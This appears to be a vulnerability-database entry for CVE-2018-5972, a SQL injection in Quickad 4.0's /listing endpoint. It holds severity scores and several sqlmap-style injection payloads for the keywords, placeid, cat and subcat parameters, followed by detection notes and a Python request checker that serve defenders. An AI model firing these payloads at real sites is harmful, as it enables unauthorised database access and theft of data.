CVE-2018-5972
Published 2018-01-24

CVE-2018-5972: SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.

Priority: P2 · 71 · CVSS 3.0: 9.8 (critical) · Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: yes
EPSS: 19.49% (97.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| quickad_project | quickad | — | — |
Detection & IOCs (extracted from sources)
- url: http://localhost/[PATH]/listing?keywords=[SQL]&location=All%20United%20States&placetype=country&placeid=231[SQL]&cat=[SQL]&subcat=5[SQL]&filter=&sort=Newest&Submit=
- command: keywords=a%' AND 1665=1665 AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit=
- command: keywords=a%' AND (SELECT 7944 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(7944=7944,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231') AND 1976=1976 AND ('lFmx'='lFmx&cat=&subcat=5&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231') AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(3263=3263,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('psTy'='psTy&cat=&subcat=5&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7871,0x465344587867724149544c5a556147787a5876737447595477725372556d4a576c786c50546d7667,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJTp&cat=&subcat=5&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND 7923=7923 AND ('zhKR'='zhKR&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND (SELECT 5797 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(5797=5797,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('SvkR'='SvkR&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') UNION ALL SELECT CONCAT(0x71706a7871,0x6d72485769576563544a7a73516f67797544477a67515556755054545146717253556e676e705a74,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jcSO&filter=&sort=Newest&Submit=
- command: keywords=a&location=All United States&placetype=country&placeid=231&cat=' UNION ALL SELECT NULL,CONCAT(0x71706a7871,0x786a716b7066557459416e78454b506469534c61464f6d78664e434a49506c494b7a795243554556,0x716a6b6271),NULL-- gLLf&subcat=5&filter=&sort=Newest&Submit=
- Monitor GET requests to the /listing endpoint for SQL injection patterns in the keywords, placeid, cat, and subcat parameters: specifically look for single-quote injection, UNION ALL SELECT, boolean-based blind payloads (AND <int>=<int>), and FLOOR(RAND(0)*2) error-based payloads.
- Detect the hex-encoded canary strings 0x71706a7871 and 0x716a6b6271 in HTTP query parameters; these are sqlmap-style bookend markers (qpjxq and qjkbq) used to delimit extracted data in UNION and error-based payloads.
- The UNION-based payloads against the placeid and subcat parameters use a 31-column projection (UNION ALL SELECT NULL x31). Alert on UNION ALL SELECT queries with large NULL column counts in URL parameters targeting /listing.
- The UNION-based payload against the cat parameter uses a 3-column projection. Alert on UNION ALL SELECT with 3 NULLs in the cat parameter of /listing requests.
- Error-based injection uses INFORMATION_SCHEMA.PLUGINS with GROUP BY and FLOOR(RAND(0)*2), a classic MySQL >= 5.0 error-based technique. Detect this pattern in WAF/IDS rules on HTTP query strings.
- The keywords parameter injection uses a trailing wildcard-style quote bypass pattern (%' AND ... AND '%'='); detect URL-encoded single quotes combined with AND clauses in the keywords GET parameter.
- The placeid and subcat parameters are injected with a closing parenthesis and single-quote pattern (') AND ...); detect ') followed by SQL keywords in these parameters.
- All proof-of-concept payloads target a local/development instance (localhost). In production, the host and [PATH] prefix will vary; detection rules must be host-agnostic and focus on the /listing URI path and parameter patterns.
- The vulnerability is confirmed only against Quickad version 4.0. Other versions are not mentioned as affected.
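The detection notes above translated into a small, host-agnostic checker, as an added example that is not part of this record or of Quickad itself: it inspects only the /listing path and the four named parameters, applies the patterns listed (quote plus AND, ') breakout, UNION ALL SELECT with NULL counting, FLOOR(RAND(0)*2), and the sqlmap canaries), and returns which rules fired per parameter. Rule names and the sample request targets are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Parameters the advisory names as injectable on the /listing endpoint.
INJECTABLE = ("keywords", "placeid", "cat", "subcat")

# Detection rules distilled from the IOC notes (rule names are ours, not the record's).
RULES = {
    "quote_and_boolean": re.compile(r"'\s*\)?\s*AND\s+\d+\s*=\s*\d+", re.I),
    "paren_quote_break": re.compile(r"'\)\s*(AND|OR|UNION)\b", re.I),
    "union_null_projection": re.compile(r"UNION\s+ALL\s+SELECT\b", re.I),
    "error_based_floor_rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "sqlmap_canary": re.compile(r"0x71706a7871|0x716a6b6271", re.I),
}
UNION_NULLS = re.compile(r"\bNULL\b", re.I)


def inspect_request(target: str) -> dict:
    """Return {param: [rule, ...]} for a /listing request target; {} when nothing fires."""
    parts = urlsplit(target)
    if not parts.path.endswith("/listing"):  # host and [PATH] prefix vary; only the tail matters
        return {}
    hits: dict = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in INJECTABLE:
            continue
        for raw in values:
            value = unquote_plus(raw)  # second decode catches double-encoded quotes
            matched = [rule for rule, rx in RULES.items() if rx.search(value)]
            if "union_null_projection" in matched:
                # Column count is a useful triage signal: 31 for placeid/subcat, 3 for cat per the record.
                matched.append(f"union_nulls={len(UNION_NULLS.findall(value))}")
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits


# Constructed request targets, URL-encoded as a web server would log them.
SAMPLE_REQUESTS = [
    "/site/listing?keywords=bike&placeid=231&cat=3&subcat=5&sort=Newest",                       # benign
    "/site/listing?keywords=a%25%27+AND+1665%3D1665+AND+%27%25%27%3D&placeid=231&cat=&subcat=5",  # boolean probe
    "/site/listing?keywords=a&placeid=231%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CCONCAT%280x71706a7871%2C0x716a6b6271%29--+x&cat=&subcat=5",
    "/site/search?keywords=a%25%27+AND+1%3D1+AND+%27%25%27%3D",                                   # other endpoint
]


def scan(requests):
    """Return [(index, hits)] for every request that triggers at least one rule."""
    return [(i, h) for i, r in enumerate(requests) if (h := inspect_request(r))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS):
        print(idx, hits)
```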
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.